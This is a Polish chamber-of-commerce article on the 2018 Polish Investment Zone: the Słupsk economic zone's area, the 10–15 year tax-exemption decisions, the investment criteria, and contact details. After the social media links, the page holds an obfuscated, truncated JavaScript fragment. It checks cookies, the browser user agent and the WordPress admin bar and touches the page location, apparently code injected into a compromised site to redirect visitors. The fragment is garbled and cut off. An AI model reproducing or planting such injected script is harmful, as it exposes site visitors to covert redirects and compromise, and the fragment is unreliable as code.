Polska Strefa Inwestycji – nowe narzędzie wsparcia rozwoju dla przedsiębiorców i samorządów | Północna Izba Gospodarcza w Koszalinie

W dniu 4 września 2018r. opublikowano rozporządzenia wykonawcze do uchwalonej w czerwcu 2018r. Ustawy o wspieraniu nowych inwestycji (Dz.U. 2018, poz. 1162). Dzięki temu cała Polska stała się specjalną strefą ekonomiczną tzw. Polską Strefą Inwestycji (PSI). Czternastu spółkom zarządzającym specjalnymi strefami ekonomicznymi, w tym Pomorskiej Agencji Rozwoju Regionalnego S.A. (zarządzającej obszarem Słupskiej SSE) przypisano obszary geograficznego działania (wg Rozporządzenia Ministra Przedsiębiorczości i Technologii w sprawie ustalenia obszarów i przypisania ich zarządzającym Dz.U. 2018, poz. 1698). Zdefiniowano także zasady i kryteria udzielania pomocy publicznej dla przedsiębiorców realizujących nowe inwestycje.

Na jakim obszarze działa teraz Słupska SSE?

Słupska SSE obejmuje swym zasięgiem 16 powiatów (mapa poniżej), a Pomorska Agencja Rozwoju Regionalnego S.A., która zarządza Słupską Strefą, stała się regionalnym punktem kontaktowym zarówno dla przedsiębiorców oraz samorządów. Decyzja o wsparciu umożliwia przedsiębiorcom ubieganie się o zwolnienie od podatku dochodowego i jest wydawana w zależności od lokalizacji inwestycji na okres od 10 do 15 lat. Maksymalny 15-letni okres będzie udzielany dla inwestycji realizowanych na terenie dotychczasowych podstref Słupskiej SSE, które będą funkcjonowały do 2026 roku (w woj. zachodniopomorskim są to następujące podstrefy: Darłowo, Kalisz Pomorski, Karlinko, Koszalin, Laski Koszalińskie, Polanów, Szczecinek, Tychowo oraz Wałcz). Planując realizację nowej inwestycji na pozostałych poza-strefowych terenach (w woj. pomorskim i zachodniopomorskim) decyzja o wsparciu wydawana jest na okres 12 lat. Dla inwestycji na terenie woj. wielkopolskiego okres ważności decyzji wynosi 10 lat.

Program PSI jest dedykowany zarówno dla przedsiębiorców, którzy zamierzają utworzenie
i budowę nowego zakładu, jak i tych, którzy planują rozwój obecnej firmy m.in. poprzez zwiększenie zdolności produkcyjnej, dywersyfikację produkcji lub zasadniczą zmianę procesu produkcyjnego.

Warunkiem uzyskania decyzji będzie spełnienie przez przedsiębiorców kryteriów ilościowych (uzależnionych od wielkości przedsiębiorstwa i lokalizacji inwestycji) oraz kryteriów jakościowych opisanych w Rozporządzeniu ws. pomocy publicznej udzielanej niektórym przedsiębiorcom na realizację nowych inwestycji  (Dz.U. 2018, poz. 1713).

Kryteria ilościowe będą określały minimalne koszty inwestycji, których wysokość uzależniona jest od stopy bezrobocia w danym powiecie, w porównaniu do przeciętnej stopy bezrobocia kraju, wielkości przedsiębiorstwa oraz rodzaju inwestycji (sektora przemysłowego lub sektora usług).

Dodatkowe preferencje przyznawane są dla inwestycji z sektora nowoczesnych usług biznesowych oraz dla inwestycji realizowanych w miastach średnich tracących funkcje społeczno-gospodarcze oraz gminach bezpośrednio graniczących z takimi miastami. Na terenie woj. zachodniopomorskiego w obszarze zarządzanym przez Słupską SSE są to następujące miasta (oraz gminy bezpośrednio z nimi sąsiadujące): Białogard (Gmina Białogard), Szczecinek (Gmina Szczecinek), Świdwin (Gmina Świdwin i Gmina Brzeżno) oraz Wałcz (Gmina Wałcz).

Przedsiębiorcy zainteresowani uzyskaniem bliższych informacji nt. zasad udzielania decyzji
o wsparciu na nowe inwestycje zapraszamy do kontaktu z Pomorską Agencją Rozwoju Regionalnego S.A., która zarządza obszarem Słupskiej SSE. Zachęcamy także samorządy w obszaru Słupskiej SSE

Zapraszamy przedsiębiorców i samorządy do współpracy z nami !

Pomorska Agencja Rozwoju Regionalnego S.A.
Zespół ds. Promocji i Pozyskiwania Inwestorów

tel. 59 840 11 73
promocja@parr.slupsk.pl
www.sse.slupsk.pl

Zapraszamy do śledzenia naszych profili na portalach społecznościowych! 

facebook.com/SlupskSEZ twitter.com/PARR_Slupsk  instagram.com/parr.slupsk youtube.com/ Pomorska Agencja Rozwoju Regionalnego

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m